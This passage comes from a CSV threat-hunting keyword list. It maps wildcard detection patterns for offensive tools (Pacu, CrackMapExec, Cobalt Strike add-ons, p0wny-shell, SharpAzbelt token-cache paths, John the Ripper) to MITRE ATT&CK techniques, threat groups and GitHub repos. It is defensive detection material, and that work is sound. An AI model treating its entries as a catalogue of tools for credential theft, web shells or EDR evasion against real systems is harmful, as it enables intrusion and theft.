Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*OverrideLHOST 360.com*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*owa */autodiscover/autodiscover.xml* --recon*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*OWASP*Amass*,offensive_tool_keyword,amass,The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.,T1595 - T1596 - T1018 - T1482,TA0007 - TA0043 - ,N/A,N/A,Information Gathering,https://github.com/caffix/amass,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*OwnerPersist-POST.*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*Ox-Bruter.pl*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*-p 5000:5000 pador_vuln_server*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*P0cL4bs*,offensive_tool_keyword,Github Username,github repo name hosting lots of exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/P0cL4bs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0dalirius/Coercer*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z -*p0dalirius/Coercer*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*p0dalirius/ExtractBitlockerKeys*,offensive_tool_keyword,ExtractBitlockerKeys,A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.,T1003.002 - T1039 - T1087.002,TA0006 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/p0dalirius/ExtractBitlockerKeys,1,1,N/A,10,2,170,22,2023-10-01T21:17:31Z,2023-09-19T07:28:11Z -*p0dalirius/LDAPWordlistHarvester*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*p0dalirius/pyLAPS*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*p0f -i eth* -p*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & 
Spoofing,https://www.kali.org/tools/p0f/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0f/p0f.fp*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*p0wnedShell*,offensive_tool_keyword,p0wnedShell,p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.,T1086 - T1059 - T1106 - T1566,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/p0wnedShell,1,1,N/A,N/A,10,1488,363,2019-08-02T16:24:39Z,2015-12-25T11:44:37Z -*p0wny-shell*,offensive_tool_keyword,p0wny-shell,p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. 
Use it with caution: this script represents a security risk for the server.,T1059 - T1027 - T1053 - T1035 - T1105,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/flozz/p0wny-shell,1,1,N/A,N/A,10,1578,620,2023-08-10T15:54:47Z,2016-11-09T20:41:01Z -*p3nt4/Nuages*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*P4wnP1*,offensive_tool_keyword,P4wnP1,P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).,T1200 - T1056.001 - T1059.003 - T1547.001,TA0002 - TA0003 - TA0004,N/A,N/A,Network Exploitation tools,https://github.com/RoganDawes/P4wnP1,1,1,N/A,N/A,10,3768,667,2019-10-31T12:30:16Z,2017-02-22T14:34:09Z -*P8CuaPrgwBjunvZxJcgq*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*pack_py_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*package externc2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*package_cvs_into_lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*package=impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PackMyPayload.py*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*PackMyPayload-master*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*pacu --exec *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --list-modules*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-args=*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon 
Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-info*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --module-name *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --session *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --set-regions *,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu --whoami*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu/core pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - 
TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu/last_update.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*pacu-master.zip*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*padekgcemlokbadohgkifijomclgjgif*,greyware_tool_keyword,Proxy SwitchyOmega,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*padlock2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*padre -u *http*://*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*padre-master.zip*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/glebarez/padre,1,1,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -*papacat -l -p *,offensive_tool_keyword,JustEvadeBro,JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.,T1562.001 - T1055.012 - T1218.011,TA0005 - TA0040 - TA0010,N/A,N/A,Defense Evasion,https://github.com/sinfulz/JustEvadeBro,1,0,N/A,8,3,260,25,2023-03-30T06:22:24Z,2021-05-11T06:26:10Z -*ParamPamPam*,offensive_tool_keyword,ParamPamPam,This tool is used for brute discover GET and POST parameters.,T1110 - T1210 - T1211,TA0001 - TA0002 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/ParamPamPam,1,1,N/A,N/A,3,244,60,2022-06-27T11:45:19Z,2018-11-10T08:38:30Z -*parrot*security.vdi*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*parrotsec.org/download/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Parrot-security-*.iso*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*parse_aggressor_properties*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*parse_nessus_file*,offensive_tool_keyword,crackmapexec,function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*parse_nmap_xml*,offensive_tool_keyword,crackmapexec,function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*parse_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*ParseMSALCache*.azure\msal_token_cache.bin*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*parser.exe -a *.dmp*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*parser.exe -a *.dmp*,offensive_tool_keyword,udmp-parser,A Cross-Platform C++ parser library for Windows user minidumps.,T1005 - T1059.003 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,Credential Access,https://github.com/0vercl0k/udmp-parser,1,0,N/A,6,2,160,22,2023-08-27T18:30:24Z,2022-01-30T18:56:21Z -*PassDetective extract*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*PassDetective-main.*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,1,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*passhunt.exe*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. 
standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*passhunt.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*passhunt.py*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*passivex.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*passivex.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*passphrase-rule1.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*passphrase-rule2.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*passphrase-wordlist*,offensive_tool_keyword,passphrase-wordlist,This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1.000 permutations of each phase.,T1003 - T1110 - T1113 - T1137,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/initstring/passphrase-wordlist,1,0,N/A,N/A,10,989,149,2023-03-16T03:22:53Z,2017-12-05T20:53:13Z -*pass-station search tomcat*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 